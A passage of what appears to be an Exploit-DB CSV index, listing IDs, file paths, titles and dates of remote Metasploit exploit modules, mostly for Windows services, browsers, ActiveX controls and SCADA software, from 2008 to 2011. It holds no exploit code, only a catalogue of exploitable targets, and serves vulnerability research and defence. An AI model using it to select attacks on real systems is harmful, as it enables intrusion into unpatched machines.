Remote Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, +16341,exploits/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, +16342,exploits/windows/remote/16342.rb,"Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, +16343,exploits/windows/remote/16343.rb,"Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16344,exploits/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16345,exploits/windows/remote/16345.rb,"D-Link TFTP 1.0 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16347,exploits/windows/remote/16347.rb,"3Com TFTP Service (3CTftpSvc) - 'Mode' Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16348,exploits/windows/remote/16348.rb,"Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16349,exploits/windows/remote/16349.rb,"TFTPD32 < 2.21 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16350,exploits/windows/remote/16350.rb,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)",2011-03-05,Metasploit,remote,windows, +16351,exploits/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16352,exploits/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16353,exploits/windows/remote/16353.rb,"AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16354,exploits/windows/remote/16354.rb,"Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)",2010-07-07,Metasploit,remote,windows, +16355,exploits/windows/remote/16355.rb,"Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)",2010-07-25,Metasploit,remote,windows, +16356,exploits/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)",2010-07-25,Metasploit,remote,windows, +16357,exploits/windows/remote/16357.rb,"Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit)",2010-04-30,Metasploit,remote,windows, +16358,exploits/windows/remote/16358.rb,"Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16359,exploits/windows/remote/16359.rb,"Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16360,exploits/windows/remote/16360.rb,"Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)",2010-09-21,Metasploit,remote,windows, +16361,exploits/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)",2011-02-17,Metasploit,remote,windows, +16362,exploits/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)",2011-01-21,Metasploit,remote,windows, +16363,exploits/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)",2010-07-03,Metasploit,remote,windows, +16364,exploits/windows/remote/16364.rb,"Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit)",2010-05-09,Metasploit,remote,windows, +16366,exploits/windows/remote/16366.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,remote,windows, +16367,exploits/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)",2011-02-17,Metasploit,remote,windows, +16368,exploits/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)",2010-07-03,Metasploit,remote,windows, +16369,exploits/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,remote,windows, +16370,exploits/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16371,exploits/windows/remote/16371.rb,"Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)",2010-07-03,Metasploit,remote,windows, +16372,exploits/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)",2010-10-05,Metasploit,remote,windows, +16373,exploits/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,remote,windows, +16374,exploits/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,remote,windows, +16375,exploits/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)",2010-08-25,Metasploit,remote,windows, +16376,exploits/windows/remote/16376.rb,"Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, +16377,exploits/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)",2010-07-25,Metasploit,remote,windows, +16378,exploits/windows/remote/16378.rb,"Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)",2010-05-09,Metasploit,remote,windows, +16379,exploits/windows/remote/16379.rb,"Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)",2010-05-09,Metasploit,remote,windows, +16380,exploits/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC - Remote Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16381,exploits/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Remote Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, +16382,exploits/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows, +16383,exploits/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows, +16384,exploits/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, +16385,exploits/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16388,exploits/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware, +16389,exploits/windows/remote/16389.rb,"Omni-NFS Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16390,exploits/windows/remote/16390.rb,"Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)",2010-09-20,Metasploit,remote,windows, +16391,exploits/windows/remote/16391.rb,"EMC AlphaStor Agent - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16392,exploits/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)",2011-01-24,Metasploit,remote,windows, +16393,exploits/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)",2010-04-30,Metasploit,remote,windows, +16394,exploits/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,remote,windows, +16395,exploits/windows/remote/16395.rb,"Microsoft SQL Server - Payload Execution (Metasploit)",2010-12-21,Metasploit,remote,windows, +16396,exploits/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,remote,windows, +16397,exploits/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,remote,windows, +16398,exploits/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,remote,windows, +16399,exploits/windows/remote/16399.rb,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16400,exploits/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,remote,windows, +16401,exploits/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16402,exploits/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16403,exploits/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16404,exploits/windows/remote/16404.rb,"Computer Associates ARCserve - REPORTREMOTEEXECUTECML Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16405,exploits/windows/remote/16405.rb,"CA BrightStor Universal Agent - Remote Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16406,exploits/windows/remote/16406.rb,"CA BrightStor Discovery Service - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16407,exploits/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16408,exploits/windows/remote/16408.rb,"CA BrightStor Discovery Service - TCP Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16409,exploits/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (2)",2010-11-03,Metasploit,remote,windows, +16410,exploits/windows/remote/16410.rb,"Computer Associates - Alert Notification Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16411,exploits/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (3)",2010-11-03,Metasploit,remote,windows, +16412,exploits/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows, +16413,exploits/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16414,exploits/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - 'GCR NETWORK' Remote Buffer Overflow (Metasploit)",2010-11-03,Metasploit,remote,windows, +16415,exploits/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - 'rxsSetDataGrowthScheduleAndFilter' Remote Buffer Overflow (Metasploit)",2011-03-10,Metasploit,remote,windows, +16416,exploits/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflows (Metasploit)",2010-11-04,Metasploit,remote,windows, +16417,exploits/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows, +16418,exploits/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16419,exploits/windows/remote/16419.rb,"Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16420,exploits/windows/remote/16420.rb,"Firebird Relational Database - 'SVC_attach()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16421,exploits/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,remote,windows, +16422,exploits/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16423,exploits/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows, +16424,exploits/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16425,exploits/windows/remote/16425.rb,"Asus Dpcproxy - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16426,exploits/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16427,exploits/windows/remote/16427.rb,"Microsoft Windows RSH daemon - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16428,exploits/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16429,exploits/windows/remote/16429.rb,"HP OpenView - Operations OVTrace Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16430,exploits/windows/remote/16430.rb,"BigAnt Server 2.2 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16431,exploits/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16432,exploits/windows/remote/16432.rb,"Firebird Relational Database - 'isc_create_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16433,exploits/windows/remote/16433.rb,"BomberClone 0.11.6 - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16434,exploits/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16435,exploits/windows/remote/16435.rb,"HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,remote,windows, +16436,exploits/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16437,exploits/windows/remote/16437.rb,"Borland Interbase - 'isc_create_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16438,exploits/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16439,exploits/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Remote Buffer Overflow (Metasploit)",2010-08-25,Metasploit,remote,windows, +16440,exploits/windows/remote/16440.rb,"Firebird Relational Database - 'isc_attach_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16441,exploits/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16442,exploits/windows/remote/16442.rb,"Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit)",2010-10-05,Metasploit,remote,windows, +16443,exploits/windows/remote/16443.rb,"Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)",2010-08-25,Metasploit,remote,windows, +16444,exploits/windows/remote/16444.rb,"TinyIdentD 2.2 - Remote Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16445,exploits/windows/remote/16445.rb,"Bopup Communications Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16446,exploits/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Remote Buffer Overflow (Metasploit)",2010-10-09,Metasploit,remote,windows, +16447,exploits/windows/remote/16447.rb,"Borland Interbase - 'isc_attach_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16448,exploits/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16449,exploits/windows/remote/16449.rb,"Borland Interbase - 'SVC_attach()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16450,exploits/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service - Authentication Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16451,exploits/windows/remote/16451.rb,"eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16452,exploits/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,remote,windows, +16453,exploits/windows/remote/16453.rb,"Borland Interbase - 'Create-Request' Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16454,exploits/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16455,exploits/windows/remote/16455.rb,"HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,remote,windows, +16456,exploits/windows/remote/16456.rb,"Realtek Media Player Playlist - Remote Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, +16457,exploits/windows/remote/16457.rb,"LANDesk Management Suite 8.7 - Alert Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16458,exploits/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows, +16459,exploits/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16460,exploits/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16461,exploits/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16462,exploits/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16463,exploits/windows/remote/16463.rb,"PuTTy.exe 0.53 - Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16464,exploits/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16465,exploits/windows/remote/16465.rb,"Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16466,exploits/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,remote,win_x86, +16467,exploits/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)",2011-01-08,Metasploit,remote,windows, +16468,exploits/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)",2010-04-30,Metasploit,remote,windows, +16469,exploits/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)",2010-04-30,Metasploit,remote,windows, +16470,exploits/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)",2010-07-25,Metasploit,remote,windows, +16471,exploits/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,remote,windows, +16472,exploits/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)",2010-06-15,Metasploit,remote,windows, +16473,exploits/windows/remote/16473.rb,"Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16474,exploits/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)",2010-07-01,Metasploit,remote,windows, +16475,exploits/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16476,exploits/windows/remote/16476.rb,"Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16478,exploits/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16479,exploits/windows/remote/16479.rb,"IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16480,exploits/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16481,exploits/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)",2010-08-25,Metasploit,remote,windows, +16482,exploits/windows/remote/16482.rb,"Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16483,exploits/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16484,exploits/windows/remote/16484.rb,"Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16485,exploits/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16486,exploits/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP Authenticate Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16487,exploits/windows/remote/16487.rb,"Ipswitch IMail Server - IMAP SEARCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16488,exploits/windows/remote/16488.rb,"Novell NetMail 3.52d - IMAP APPEND Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16489,exploits/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16490,exploits/windows/remote/16490.rb,"UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16491,exploits/windows/remote/16491.rb,"WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)",2009-12-06,Metasploit,remote,windows, +16492,exploits/windows/remote/16492.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest debug Buffer Overflow (Metasploit)",2010-09-21,Metasploit,remote,windows, +16493,exploits/windows/remote/16493.rb,"EnjoySAP SAP GUI - ActiveX Control Arbitrary File Download (Metasploit)",2010-12-01,Metasploit,remote,windows, +16494,exploits/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Remote Stack Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,remote,windows, +16495,exploits/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl - Remote Code Execution (Metasploit)",2011-01-22,Metasploit,remote,multiple, +16496,exploits/windows/remote/16496.rb,"Kazaa Altnet Download Manager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16497,exploits/windows/remote/16497.rb,"RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16498,exploits/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16499,exploits/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,remote,windows, +16500,exploits/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows, +16502,exploits/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16505,exploits/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16506,exploits/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,remote,windows, +16507,exploits/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,remote,windows, +16508,exploits/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,remote,windows, +16509,exploits/windows/remote/16509.rb,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' (Metasploit)",2011-02-22,Metasploit,remote,windows, +16510,exploits/windows/remote/16510.rb,"McAfee Subscription Manager - Remote Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16511,exploits/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16512,exploits/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,remote,windows, +16513,exploits/windows/remote/16513.rb,"Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16514,exploits/windows/remote/16514.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest Buffer Overflow (Metasploit)",2010-09-21,Metasploit,remote,windows, +16515,exploits/windows/remote/16515.rb,"Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution (Metasploit)",2010-05-26,Metasploit,remote,windows, +16516,exploits/windows/remote/16516.rb,"Microsoft WMI Administration Tools - ActiveX Buffer Overflow (Metasploit)",2011-01-14,Metasploit,remote,windows, +16517,exploits/windows/remote/16517.rb,"IBM Access Support - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16518,exploits/windows/remote/16518.rb,"Chilkat Crypt - ActiveX WriteFile Unsafe Method (Metasploit)",2010-09-20,Metasploit,remote,windows, +16519,exploits/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows, +16520,exploits/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16521,exploits/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)",2010-05-09,Metasploit,remote,windows, +16522,exploits/windows/remote/16522.rb,"Yahoo! Messenger - 'YVerInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16523,exploits/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16524,exploits/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16525,exploits/windows/remote/16525.rb,"AOL Instant Messenger AIM - goaway Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16526,exploits/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)",2010-08-12,Metasploit,remote,windows, +16527,exploits/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow (Metasploit)",2010-05-04,Metasploit,remote,windows, +16528,exploits/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16530,exploits/windows/remote/16530.rb,"mIRC - IRC URL Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16532,exploits/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)",2010-07-03,Metasploit,remote,windows, +16533,exploits/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)",2011-02-08,Metasploit,remote,windows, +16534,exploits/windows/remote/16534.rb,"AtHocGov IWSAlerts - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, +16535,exploits/windows/remote/16535.rb,"Trend Micro OfficeScan - Client ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16536,exploits/windows/remote/16536.rb,"Green Dam - URL Processing Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows, +16537,exploits/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) 